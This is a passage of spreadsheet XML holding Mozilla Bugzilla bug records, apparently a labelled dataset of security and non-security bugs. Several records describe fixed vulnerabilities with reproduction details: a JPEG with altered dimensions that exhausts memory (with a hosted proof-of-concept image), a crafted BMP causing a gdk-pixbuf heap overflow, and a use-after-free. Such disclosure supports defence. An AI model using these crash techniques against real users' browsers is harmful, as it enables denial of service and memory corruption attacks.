      <c r="U1473" t="n">
        <v>0</v>
      </c>
      <c r="V1473" t="n">
        <v>25</v>
      </c>
      <c r="W1473" t="inlineStr">
        <is>
          <t>mozilla-central, debug:
1. Load http://keith-wood.name/datepick.html
Result: Crash [@ js_GetUpvar]</t>
        </is>
      </c>
      <c r="X1473" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" t="n">
        <v>1767194</v>
      </c>
      <c r="B1474" t="inlineStr">
        <is>
          <t>2022-05-01 05:50:31 -0700</t>
        </is>
      </c>
      <c r="C1474" t="inlineStr">
        <is>
          <t>persistent browser DoS via favicon containing a small JPEG images that list their image dimensions as large</t>
        </is>
      </c>
      <c r="D1474" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:05 -0700</t>
        </is>
      </c>
      <c r="E1474" t="n">
        <v>1</v>
      </c>
      <c r="F1474" t="n">
        <v>1</v>
      </c>
      <c r="G1474" t="n">
        <v>3</v>
      </c>
      <c r="H1474" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1474" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1474" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1474" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1474" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1474" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1474" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1474" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main113+]</t>
        </is>
      </c>
      <c r="Q1474" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1474" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1474" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T1474" t="n">
        <v>1</v>
      </c>
      <c r="U1474" t="n">
        <v>0</v>
      </c>
      <c r="V1474" t="n">
        <v>26</v>
      </c>
      <c r="W1474" t="inlineStr">
        <is>
          <t># Summary
Upon loading a jpeg image with large dimensions, Firefox attempts to allocate a large amount of memory which in certain contexts can causes effects outside of the sandbox, causing Firefox to crash.
# System configuration
* Firefox Developer Edition 100.0b9 (64-bit)
* Linux kernel version 5.17.4
# Description
I was able create a single pixel image file of size 1.4kb. I then modified the binary image file data to list the dimensions of the image as 61680 x 61680. In order to render this image, Firefox attempts to allocate memory to store this image.
When a page that displays this image is rendered, the sandboxed tab crashes. However, when the image is viewed inside the Network Monitor, the Firefox application also crashes after it is killed by the OOM-killer.
# Proof of Concept
1. Loading the following image in the browser will cause the tab to crash: [https://exploit-py.herokuapp.com/tiny.jpg](https://exploit-py.herokuapp.com/tiny.jpg)
2. Opening the Network Monitor and previewing the image (e.g. by hovering over the image name) will cause Firefox to crash.
```
sam@samtop ~ % firefox-developer-edition 
ATTENTION: default value of option mesa_glthread overridden by environment.
ATTENTION: default value of option mesa_glthread overridden by environment.
ATTENTION: default value of option mesa_glthread overridden by environment.
Corrupt JPEG data: premature end of data segment
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
[1]    47893 killed     firefox-developer-edition
firefox-developer-edition  11.74s user 21.24s system 104% cpu 31.489 total
137 sam@samtop ~ %  
```
## Relevant code
In `image/decoders/iccjpeg.c`
https://hg.mozilla.org/mozilla-central/file/6e268f45bed2487cce05cfae5cabb7c1c8f415a6/image/decoders/iccjpeg.c#l159
```cpp
/* Allocate space for assembled data */
icc_data = (JOCTET*)malloc(total_length * sizeof(JOCTET));
if (icc_data == NULL) {
  return FALSE; /* oops, out of memory */
}
```
In `image/decoders/nsJPEGDecoder.cpp`
https://hg.mozilla.org/mozilla-central/file/6e268f45bed2487cce05cfae5cabb7c1c8f415a6/image/decoders/nsJPEGDecoder.cpp#l839
```cpp
// Round up to multiple of 256 bytes.
const size_t roundup_buflen = ((new_backtrack_buflen + 255) &gt;&gt; 8) &lt;&lt; 8;
JOCTET* buf = (JOCTET*)realloc(decoder-&gt;mBackBuffer, roundup_buflen);
// Check for OOM
if (!buf) {
  decoder-&gt;mInfo.err-&gt;msg_code = JERR_OUT_OF_MEMORY;
  my_error_exit((j_common_ptr)(&amp;decoder-&gt;mInfo));
}
```
In `media/libjpeg/jdhuff.c`
https://searchfox.org/mozilla-central/source/media/libjpeg/jdhuff.c#354-373
```cpp
no_more_bytes:
    /* We get here if we've read the marker that terminates the compressed
     * data segment.  There should be enough bits in the buffer register
     * to satisfy the request; if so, no problem.
     */
    if (nbits &gt; bits_left) {
      /* Uh-oh.  Report corrupted data to user and stuff zeroes into
       * the data stream, so that we can produce some kind of image.
       * We use a nonvolatile flag to ensure that only one warning message
       * appears per data segment.
       */
      if (!cinfo-&gt;entropy-&gt;insufficient_data) {
        WARNMS(cinfo, JWRN_HIT_MARKER);
        cinfo-&gt;entropy-&gt;insufficient_data = TRUE;
      }
      /* Fill the buffer with zero bits */
      get_buffer &lt;&lt;= MIN_GET_BITS - bits_left;
      bits_left = MIN_GET_BITS;
    }
  }
```
`WARNMS(cinfo, JWRN_HIT_MARKER)` generates the `Corrupt JPEG data: premature end of data segment` message.
In general, when Linux is configured to overcommit memory (this is the default configuration), malloc doesn't return 0 when there is no memory left.
It is also possible for the OOM killer to kill a process that isn't Firefox that happens to be vital to the function of the Operating System causing an OS crash.
# Notes
In Chromium, upon loading this image does not crash. On chromium in certain contexts, the image with fail to load and is displayed as an invalid image file. In other contexts, the image will correctly be displayed as single pixel white image. This happens without causing excessive memory usage.
It's possible that images loaded from inside sandboxed tabs should not be loaded outside of the sandbox.</t>
        </is>
      </c>
      <c r="X1474" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" t="n">
        <v>63274</v>
      </c>
      <c r="B1475" t="inlineStr">
        <is>
          <t>2000-12-18 21:58:36 -0800</t>
        </is>
      </c>
      <c r="C1475" t="inlineStr">
        <is>
          <t>[MF][FIX]Using arrow keys with combo boxes doesn't correctly submit value displayed</t>
        </is>
      </c>
      <c r="D1475" t="inlineStr">
        <is>
          <t>2019-03-13 06:45:08 -0700</t>
        </is>
      </c>
      <c r="E1475" t="n">
        <v>1</v>
      </c>
      <c r="F1475" t="n">
        <v>1</v>
      </c>
      <c r="G1475" t="n">
        <v>3</v>
      </c>
      <c r="H1475" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1475" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1475" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1475" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1475" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1475" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N1475" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1475" t="inlineStr"/>
      <c r="Q1475" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1475" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1475" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T1475" t="n">
        <v>1</v>
      </c>
      <c r="U1475" t="n">
        <v>0</v>
      </c>
      <c r="V1475" t="n">
        <v>17</v>
      </c>
      <c r="W1475" t="inlineStr">
        <is>
          <t>- go to a bugzilla bug.
- click the Target Milestone combo box to pop down the menu
- hit up or down arrow once
- click away to dismiss the drop-down
- hit submit
Expected result:
- but should have new target milestone with the value in the combo box
Actual:
- no change at all. The data submitted did not match what the combo box displayed.
This is pretty serious.</t>
        </is>
      </c>
      <c r="X1475" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" t="n">
        <v>848535</v>
      </c>
      <c r="B1476" t="inlineStr">
        <is>
          <t>2013-03-06 13:30:35 -0800</t>
        </is>
      </c>
      <c r="C1476" t="inlineStr">
        <is>
          <t>Use of PreserveWrapper in cases when we don't have a wrapper seems broken</t>
        </is>
      </c>
      <c r="D1476" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1476" t="n">
        <v>1</v>
      </c>
      <c r="F1476" t="n">
        <v>1</v>
      </c>
      <c r="G1476" t="n">
        <v>3</v>
      </c>
      <c r="H1476" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1476" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1476" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1476" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1476" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1476" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1476" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1476" t="inlineStr">
        <is>
          <t>[qa-][adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q1476" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1476" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1476" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T1476" t="n">
        <v>1</v>
      </c>
      <c r="U1476" t="n">
        <v>0</v>
      </c>
      <c r="V1476" t="n">
        <v>18</v>
      </c>
      <c r="W1476" t="inlineStr">
        <is>
          <t>Consider the following scenario:
1)  XHR starts.
2)  Its wrapper, if any, is collected.
3)  A C++ readystatechange listener calls GetResponse, and the response type is
    JSON or arraybuffer.  This causes nsXMLHttpRequest::RootJSResultObjects to be
    called, which calls PreserveWrapper.
4)  JS touches the XHR object, causing it to be wrapped, which calls
    nsWrapperCache::SetWrapper().
In a debug build this will assert fatally. In an opt build this will clear the preserved-wrapper flag on the wrapper cache, which seems bad.
Should we just preserve that flag on SetWrapper and remove the assert in that method, perhaps?  Alternately, we should stop using PreserveWrapper to mean "hold JS objects" in XHR.
Note that the above scenario is pretty simple to produce with a worker XHR if extension JS can ever touch the main-thread nsXMLHttpRequest of it, as far as I can tell.</t>
        </is>
      </c>
      <c r="X1476" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" t="n">
        <v>894137</v>
      </c>
      <c r="B1477" t="inlineStr">
        <is>
          <t>2013-07-15 17:25:41 -0700</t>
        </is>
      </c>
      <c r="C1477" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::HTMLFormElement::IsDefaultSubmitElement</t>
        </is>
      </c>
      <c r="D1477" t="inlineStr">
        <is>
          <t>2024-05-30 08:05:36 -0700</t>
        </is>
      </c>
      <c r="E1477" t="n">
        <v>1</v>
      </c>
      <c r="F1477" t="n">
        <v>1</v>
      </c>
      <c r="G1477" t="n">
        <v>3</v>
      </c>
      <c r="H1477" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1477" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1477" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1477" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1477" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1477" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1477" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q1477" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1477" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1477" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1477" t="n">
        <v>1</v>
      </c>
      <c r="U1477" t="n">
        <v>0</v>
      </c>
      <c r="V1477" t="n">
        <v>43</v>
      </c>
      <c r="W1477" t="inlineStr">
        <is>
          <t>Created attachment 776057
Testcase
ASAN reports a use-after-free in mozilla::dom::HTMLFormElement::IsDefaultSubmitElement when the attached repro is opened.  It seems to trigger when a gc() happens, so it might take a few seconds to crash.</t>
        </is>
      </c>
      <c r="X1477" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" t="n">
        <v>1098583</v>
      </c>
      <c r="B1478" t="inlineStr">
        <is>
          <t>2014-11-13 14:01:25 -0800</t>
        </is>
      </c>
      <c r="C1478" t="inlineStr">
        <is>
          <t>Empty datachannel label results in heap overflow</t>
        </is>
      </c>
      <c r="D1478" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:51 -0700</t>
        </is>
      </c>
      <c r="E1478" t="n">
        <v>1</v>
      </c>
      <c r="F1478" t="n">
        <v>1</v>
      </c>
      <c r="G1478" t="n">
        <v>3</v>
      </c>
      <c r="H1478" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1478" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1478" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K1478" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1478" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1478" t="inlineStr">
        <is>
          <t>[adv-main35+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q1478" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1478" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1478" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1478" t="n">
        <v>1</v>
      </c>
      <c r="U1478" t="n">
        <v>0</v>
      </c>
      <c r="V1478" t="n">
        <v>22</v>
      </c>
      <c r="W1478" t="inlineStr">
        <is>
          <t>Created attachment 8522510
fix_data_channel_open_request.patch
If no label gets assigned to a data channel the memset in SendOpenRequestMesssage() can write one \0 beyond the allocate memory.
http://dxr.mozilla.org/mozilla-central/source/netwerk/sctp/datachannel/DataChannel.cpp#994
The attached patch fixes the problem.
Marking as security until we are clear how big the risk is for an exploit.
My guess it is low, given that this bug will only write one additional \0 into the heap.</t>
        </is>
      </c>
      <c r="X1478" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" t="n">
        <v>1414318</v>
      </c>
      <c r="B1479" t="inlineStr">
        <is>
          <t>2017-11-03 09:26:19 -0700</t>
        </is>
      </c>
      <c r="C1479" t="inlineStr">
        <is>
          <t>Permanent Gecko 58 "valgrind-test | 37 bytes in 1 blocks are definitely lost at malloc / moz_xmalloc / ToNewUTF8String / mozilla::nsTerminator::StartWriter" since the uplift to Beta</t>
        </is>
      </c>
      <c r="D1479" t="inlineStr">
        <is>
          <t>2022-10-31 06:22:00 -0700</t>
        </is>
      </c>
      <c r="E1479" t="n">
        <v>1</v>
      </c>
      <c r="F1479" t="n">
        <v>1</v>
      </c>
      <c r="G1479" t="n">
        <v>3</v>
      </c>
      <c r="H1479" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1479" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1479" t="inlineStr">
        <is>
          <t>Crash Reporting</t>
        </is>
      </c>
      <c r="K1479" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1479" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1479" t="inlineStr"/>
      <c r="Q1479" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1479" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1479" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1479" t="n">
        <v>1</v>
      </c>
      <c r="U1479" t="n">
        <v>0</v>
      </c>
      <c r="V1479" t="n">
        <v>37</v>
      </c>
      <c r="W1479" t="inlineStr">
        <is>
          <t>Filed by: rvandermeulen [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=141966445&amp;repo=mozilla-beta
https://queue.taskcluster.net/v1/task/cjw2S5FmTjaikq0KgJ2GNA/runs/0/artifacts/public/logs/live_backing.log
Annoyingly, these don't happen on Try for reasons I won't claim to understand.</t>
        </is>
      </c>
      <c r="X1479" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" t="n">
        <v>1627670</v>
      </c>
      <c r="B1480" t="inlineStr">
        <is>
          <t>2020-04-06 06:22:31 -0700</t>
        </is>
      </c>
      <c r="C1480" t="inlineStr">
        <is>
          <t>Upgrade python packages to latest version on Lando API</t>
        </is>
      </c>
      <c r="D1480" t="inlineStr">
        <is>
          <t>2023-03-15 06:48:31 -0700</t>
        </is>
      </c>
      <c r="E1480" t="n">
        <v>1</v>
      </c>
      <c r="F1480" t="n">
        <v>1</v>
      </c>
      <c r="G1480" t="n">
        <v>7</v>
      </c>
      <c r="H1480" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1480" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1480" t="inlineStr">
        <is>
          <t>Lando</t>
        </is>
      </c>
      <c r="K1480" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1480" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1480" t="inlineStr"/>
      <c r="Q1480" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1480" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1480" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1480" t="n">
        <v>1</v>
      </c>
      <c r="U1480" t="n">
        <v>0</v>
      </c>
      <c r="V1480" t="n">
        <v>1</v>
      </c>
      <c r="W1480" t="inlineStr">
        <is>
          <t>We've recently upgraded all the packages in Lando UI, do the same on Lando API.
Also, add support for pip-compile so we can automatically add the hash checks.</t>
        </is>
      </c>
      <c r="X1480" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" t="n">
        <v>1184009</v>
      </c>
      <c r="B1481" t="inlineStr">
        <is>
          <t>2015-07-15 01:21:57 -0700</t>
        </is>
      </c>
      <c r="C1481" t="inlineStr">
        <is>
          <t>gdk-pixbuf heap overflow and DoS affecting Firefox</t>
        </is>
      </c>
      <c r="D1481" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:12 -0700</t>
        </is>
      </c>
      <c r="E1481" t="n">
        <v>1</v>
      </c>
      <c r="F1481" t="n">
        <v>1</v>
      </c>
      <c r="G1481" t="n">
        <v>3</v>
      </c>
      <c r="H1481" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1481" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1481" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K1481" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L1481" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1481" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1481" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1481" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+][adv-main41-][adv-esr38.3-]</t>
        </is>
      </c>
      <c r="Q1481" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1481" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1481" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1481" t="n">
        <v>1</v>
      </c>
      <c r="U1481" t="n">
        <v>1</v>
      </c>
      <c r="V1481" t="n">
        <v>42</v>
      </c>
      <c r="W1481" t="inlineStr">
        <is>
          <t>Created attachment 8633956
overflow-firefox.bmp.gz
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150629114848
Steps to reproduce:
I'm forwarding this bug because it clearly affects last versions of Firefox. This was reported to upstream here (https://bugzilla.gnome.org/show_bug.cgi?id=752297) and it is supposed to be fixed (i haven't tested the patch yet).
Requirements:
* Linux x86_64
* gdk-pixbuf 2.31 or newer (you can upgrade only this package in Ubuntu/Debian download and installing from here: https://packages.debian.org/sid/libgdk-pixbuf2.0-0 or http://packages.ubuntu.com/vivid/libgdk-pixbuf2.0-0). Older versions are more difficult to exploit, but the issue is still there.
* At least 10GB of real/virtual memory (a big swapfile will do the trick if you don't have enough physical memory).
Steps to reproduce:
1. Download and decompress firefox-overflow.bmp.gz  (it is compressed to avoid crashing my own browser!)
2. Try to open (ctrl+O) or attach firefox-overflow.bmp
3. Boom
Actual results:
Firefox crashes inside gdk-pixbuf code. Details:
Program received signal SIGSEGV, Segmentation fault.
make_filter_table (filter=0x7ffffffead10) at pixops.c:1294
1294	pixops.c: No such file or directory.
(gdb) info registers 
rax            0x0	0
rbx            0x2	2
rcx            0x0	0
rdx            0x0	0
rsi            0x7fffbae00000	140736328630272
rdi            0x7fffbcfc8d00	140736364055808
rbp            0x7ffffffead10	0x7ffffffead10
rsp            0x7ffffffeab20	0x7ffffffeab20
r8             0x2b0000	2818048
r9             0x0	0
r10            0x4000010	67108880
r11            0x7fffbeb5000c	140736392921100
r12            0x8	8
r13            0x1	1
r14            0x1000003	16777219
r15            0x7fffbc436c00	140736351923200
rip            0x7fffedf57239	0x7fffedf57239 &lt;pixops_process+681&gt;
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/i $rip
=&gt; 0x7fffedf57239 &lt;pixops_process+681&gt;:	mov    %edx,(%rsi,%rax,4)
Here %rsi depens on the dimension of the malformed bmp.
Expected results:
Of course, Firefox shouldn't so easily be exploitable. Nevertheless, it is not clear how Firefox can prevent this kind of vulnerabilities in the future (unless your re-implement gdk-pixbuf functions)</t>
        </is>
      </c>
      <c r="X1481" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" t="n">
        <v>1544459</v>
      </c>
      <c r="B1482" t="inlineStr">
        <is>
          <t>2019-04-15 08:25:28 -0700</t>
        </is>
      </c>
      <c r="C1482" t="inlineStr">
        <is>
          <t>always log DEBUG output to a log file</t>
        </is>
      </c>
      <c r="D1482" t="inlineStr">
        <is>
          <t>2019-04-15 20:22:25 -0700</t>
        </is>
      </c>
      <c r="E1482" t="n">
        <v>1</v>
      </c>
      <c r="F1482" t="n">
        <v>1</v>
      </c>
      <c r="G1482" t="n">
        <v>7</v>
      </c>
      <c r="H1482" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1482" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1482" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K1482" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1482" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1482" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1482" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1482" t="inlineStr"/>
      <c r="Q1482" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1482" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1482" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1482" t="n">
        <v>1</v>
      </c>
      <c r="U1482" t="n">
        <v>0</v>
      </c>
      <c r="V1482" t="n">
        <v>3</v>
      </c>
      <c r="W1482" t="inlineStr">
        <is>
          <t>many many times it would have been useful to have a debug log of a moz-phab failure; quite often we have to ask the user to re-run the same command with debugging enabled and this isn't always possible.
we should alway log debug output to a rotated log file in ~/.mozbuild/moz-phab.</t>
        </is>
      </c>
      <c r="X1482" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" t="n">
        <v>98597</v>
      </c>
      <c r="B1483" t="inlineStr">
        <is>
          <t>2001-09-06 14:07:53 -0700</t>
        </is>
      </c>
      <c r="C1483" t="inlineStr">
        <is>
          <t>event sent to XMLHttpRequest onload handler is bogus</t>
        </is>
      </c>
      <c r="D1483" t="inlineStr">
        <is>
          <t>2002-12-02 17:36:24 -0800</t>
        </is>
      </c>
      <c r="E1483" t="n">
        <v>1</v>
      </c>
      <c r="F1483" t="n">
        <v>1</v>
      </c>
      <c r="G1483" t="n">
        <v>3</v>
      </c>
      <c r="H1483" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1483" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1483" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K1483" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1483" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1483" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1483" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1483" t="inlineStr">
        <is>
          <t>PDT+,fix on trunk and 0.9.4</t>
        </is>
      </c>
      <c r="Q1483" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1483" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1483" t="inlineStr">
        <is>
          <t>mozilla0.9.5</t>
        </is>
      </c>
      <c r="T1483" t="n">
        <v>1</v>
      </c>
      <c r="U1483" t="n">
        <v>0</v>
      </c>
      <c r="V1483" t="n">
        <v>18</v>
      </c>
      <c r="W1483" t="inlineStr">
        <is>
          <t>Accessing the event type of an event sent to an onload (or onerror) handler for
a XMLHttpRequest object results in an exception being thrown. To reproduce, run
the test referenced above and click on the "Load event" button.
Expected result: An alert dialog should bring up the name of the event ("load")
and a message stating that the test succeeded.
Actual result: A JavaScript exception is thrown when the test tries to access
the event's type attribute.</t>
        </is>
      </c>
      <c r="X1483" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" t="n">
        <v>8416</v>
      </c>
      <c r="B1484" t="inlineStr">
        <is>
          <t>1999-06-17 13:34:35 -0700</t>
        </is>
      </c>
      <c r="C1484" t="inlineStr">
        <is>
          <t>[PP]6-17 release build - Linux core dump when startup</t>
        </is>
      </c>
      <c r="D1484" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1484" t="n">
        <v>1</v>
      </c>
      <c r="F1484" t="n">
        <v>1</v>
      </c>
      <c r="G1484" t="n">
        <v>2</v>
      </c>
      <c r="H1484" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1484" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1484" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K1484" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1484" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1484" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1484" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1484" t="inlineStr">
        <is>
